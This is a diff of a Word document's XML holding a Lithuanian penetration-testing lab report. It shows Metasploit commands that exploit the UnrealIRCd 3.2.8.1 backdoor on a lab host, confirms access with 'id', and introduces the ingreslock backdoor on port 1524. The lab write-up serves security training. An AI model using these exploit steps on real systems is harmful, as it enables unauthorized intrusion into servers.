+                          <a:blip r:embed="rId15"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -10420,7 +8725,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId27"/>
+                          <a:blip r:embed="rId16"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -10522,7 +8827,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId28"/>
+                          <a:blip r:embed="rId17"/>
                           <a:srcRect b="47368"/>
                           <a:stretch/>
                         </pic:blipFill>
@@ -10581,6 +8886,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="lt-LT"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">telnet </w:t>
             </w:r>
             <w:r>
@@ -10655,6 +8961,1570 @@
                   <wp:extent cx="2581275" cy="866775"/>
                   <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                   <wp:docPr id="23" name="Picture 23"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId18"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2581275" cy="866775"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>id;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41107276" wp14:editId="2F03E033">
+                  <wp:extent cx="1857375" cy="504825"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="24" name="Picture 24"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId19"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1857375" cy="504825"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>6667 (port)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prieigą naudoja UnreaIRCD IRC paslauga (daemon). Ši versija yra su backdoor (žr. </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="lt-LT"/>
+          </w:rPr>
+          <w:t>http://forums.unrealircd.com/viewtopic.php?t=6562</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Pažeidžiamumas buvo nepastebėtas mėnesį laiko – trigeris buvo siunčiant laiškus "AB" į sistemos komandas naudojant bet kurią prieigą serveryje. Metasploit turi modulį (žr. </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="lt-LT"/>
+          </w:rPr>
+          <w:t>http://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ) išnaudoti šiam pažeidžiamumui.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="1" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2953"/>
+        <w:gridCol w:w="6497"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="368"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Atliktas veiksmas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>msfconsole</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D04A505" wp14:editId="6BDBB1C2">
+                  <wp:extent cx="3895694" cy="3466238"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="25" name="Picture 25"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId22"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3924958" cy="3492276"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>set RHOST 192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>177</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>28</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>exploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E27CFA" wp14:editId="5FE1625A">
+                  <wp:extent cx="4124325" cy="2006600"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="28" name="Picture 28"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4124325" cy="2006600"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>id</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4787F7" wp14:editId="1237D906">
+                  <wp:extent cx="2333625" cy="628650"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="27" name="Picture 27"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId24"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2333625" cy="628650"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Naudoti telnet arba metasploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">root@linux:~# </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Daug mažiau subtilus yra senas laukimo (standby) "ingreslock" Backdoor. Ji naudoja 1524 prieigą (port). Ingreslock prieiga buvo labai populiarus pasirinkimas kai prieš dešimtmetį Backdoor diegdavo į serverius. Ją gauti labai paprasta:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc258656092"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Paslaugos:netyčiniai Backdoors</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="1" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2953"/>
+        <w:gridCol w:w="6497"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="368"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Atliktas veiksmas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
+            </w:r>
+          </w:p>
